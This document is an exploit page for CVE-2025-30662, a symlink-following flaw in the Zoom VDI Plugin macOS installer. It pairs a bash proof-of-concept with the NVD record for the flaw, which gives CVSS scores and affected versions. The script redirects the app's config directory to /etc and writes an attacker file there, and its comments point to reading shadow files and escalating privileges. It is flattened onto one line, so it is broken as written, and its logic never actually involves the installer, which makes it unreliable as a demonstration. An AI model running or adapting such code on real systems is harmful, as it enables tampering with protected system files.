CVE-2025-30662

#!/bin/bash # CVE-2025-30662 PoC - Symlink Following in Zoom VDI Plugin Installer # This PoC demonstrates the symlink following vulnerability # Create a malicious symlink pointing to a sensitive directory mkdir -p /tmp/zoom_attack cd /tmp/zoom_attack # Create symlink from installation directory to sensitive location MALICIOUS_DIR="/Applications/ZoomVDI.app/Contents/Resources/config" mkdir -p "$(dirname $MALICIOUS_DIR)" ln -sf /etc "$MALICIOUS_DIR" # When installer runs, it will follow symlink and write to /etc # This could allow reading/writing sensitive files like passwd or shadow # For demonstration - create a file that would be written via symlink cat > "$MALICIOUS_DIR/malicious_config" << 'EOF' # Malicious configuration file # In real attack, this could be used to: # 1. Read sensitive config files # 2. Modify system settings # 3. Escalate privileges EOF echo "PoC demonstrates symlink creation in installation path" echo "Target: $MALICIOUS_DIR -> /etc" echo "Actual file location: /etc/malicious_config" ls -la /etc/malicious_config 2>/dev/null && echo "File successfully created via symlink!"

{"cve": {"id": "CVE-2025-30662", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:51.070", "lastModified": "2026-01-09T22:10:55.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Symlink following in the installer for the Zoom Workplace VDI Plugin macOS Universal installer before version 6.3.14, 6.4.14, and 6.5.10 in their respective tracks may allow an authenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-646"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.3.14", "matchCriteriaId": "3C47721E-82D9-4607-9C27-BAC7C1B872A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "6.4.14", "matchCriteriaId": "3508872C-50EA-4E60-9898-A444B998E77A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", "versionStartIncluding": "6.5.0", "versionEndExcluding": "6.5.10", "matchCriteriaId": "7FC04625-1677-4265-8DF8-6C563F72C0E4"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25045", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}